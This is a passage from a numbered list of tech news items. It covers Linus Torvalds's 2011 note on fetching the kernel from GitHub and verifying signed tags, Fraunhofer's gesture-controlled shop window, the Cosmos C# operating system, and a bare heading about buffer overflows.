(c) Ok, I can fetch that tree, and I know that Linus always does signed tags, and I can verify the 3.1-rc5 tag with Linus known public GPG key that I have somewhere. If it matches, I don't care who the person doing the release announcement is, I'll trust that Linus signed the tree

(d) I'll just wait for kernel.org to feel better.

Whatever works for you. One thing to note: If you just do

git pull https://github.com/torvalds/linux.git

you probably won't get the tags, since it's not your origin branch. So do

git fetch --tags <...>

too, so that you get not only the actual changes, but the tag that you can verify too.
And I *would* suggest you just pull into an existing tree, rather than clone a new copy. I bet the github people will appreciate that. Anything worth saying about the changes themselves? The appended shortlog pretty much speaks for itself: there really hasn't been much excitement on the kernel development front. Now, if you want to talk to me about dive logging software, that's a whole different kettle of fish.. Linus Source: Linux Kernel Moves To Github - Slashdot Info: https://lkml.org/lkml/2011/9/4/92
  22. Window shopping goes high tech with gesture recognition The Fraunhofer Institute's interactive shop window lets people use gestures to learn more about products on display German researchers have given a new meaning to window shopping. At the IFA consumer electronics show in Berlin the Fraunhofer Heinrich Hertz Institute showed a prototype that lets shoppers learn more about what's in a store display window when the store is closed. Called the Interactive Shop Window the system consists of a flat screen monitor and a motion tracker positioned behind the glass of a store's front window. When window-shoppers stand in front of the window, they can point at a product they want. Then the display box holding the product will light up and information for the object will be shown on the screen. Window-shoppers can then view it in different colors or sizes, or learn more about it. The system is controlled by the window-shopper's gestures, which are captured using motion tracking technology that the Fraunhofer team has been working on for a decade. The institute is looking for partners to further the technology and one day change the look of department store windows. "We're searching for partners in the industry to bring it as a new product," said Paul Chojacki, in charge of interactive media for the Fraunhofer Heinrich Hertz Institute. "We have some bigger companies in Germany who are interested in this," he said, although he didn't say which ones. Before the system is ready for a commercial debut there are still some bugs that need to be worked out. For example, the pointer will sometimes jump around the screen, or something will be selected that wasn't intended. Chojacki said one of the biggest challenges was making sure the motion tracking system filtered out reflections on the store front glass. "The window is a problem for us because it's reflecting light and pictures," he said. "We found a solution that is working very well right now." 
Another problem for the team will be teaching passers-by how to use the system because it isn't all that intuitive. Users have to stand in exactly the right spot and make gestures in a defined area for the motion tracker to see them. Chojacki said that the Fraunhofer motion tracker could be replaced by a Microsoft Kinect sensor, but that theirs is specially tailored for the project. Fraunhofer had been working on its motion tracker well before the Kinect premiered, and has shown it at previous IFA shows. In 2008 it was used in the iPointPresenter project, which allowed users to control a mouse cursor using gestures. At the time it could only track objects on a 2D plane. In 2009 the team upgraded the system for the iPoint3D project that recognized gestures on the X, Y and Z axes. Chojacki was also involved with iPoint3D. Source and video: Window shopping goes high tech with gesture recognition - webcams, retail, popular science, peripherals, monitors, Input devices, industry verticals, IFA, Fraunhofer Heinrich Hertz Institute - Techworld
  23. Cosmos - C# Open Source Managed Operating System Welcome to the Cosmos home page. Cosmos is an operating system project implemented completely in CIL compliant languages. The team is committed to using C#, however any .NET language can be used. Latest News Aug 3, 2010 - MS5 is here! Why Cosmos? Because it's fun! Do we need any more reasons? Well if you do, here is a list of many real world scenarios we envision. How does Cosmos work? Cosmos includes a compiler (IL2CPU, which is part of Cosmos) that reads the input file (usually the shell) and Cosmos libraries and compiles the resulting IL to x86 code. IL2CPU has a layer for cross platform and we plan to support other processors and platforms, including x64. IL2CPU also supports certain extension methods which allow C# code to interact directly with the CPU, registers, and ports in the kernel. IL2CPU contains some inline assembler, but there are no ASM files that need to be linked in. Currently IL2CPU first outputs raw asm files (with IL comments) and then processes them through nasm (a free assembler). Later we plan to emit directly to binary. For more information with pretty pictures please read this article at CodeProject. Source: Cosmos - Cosmos Getting started: Getting Started - Cosmos
  24. Buffer overflows - they appeared 20 years ago. Are they no longer relevant?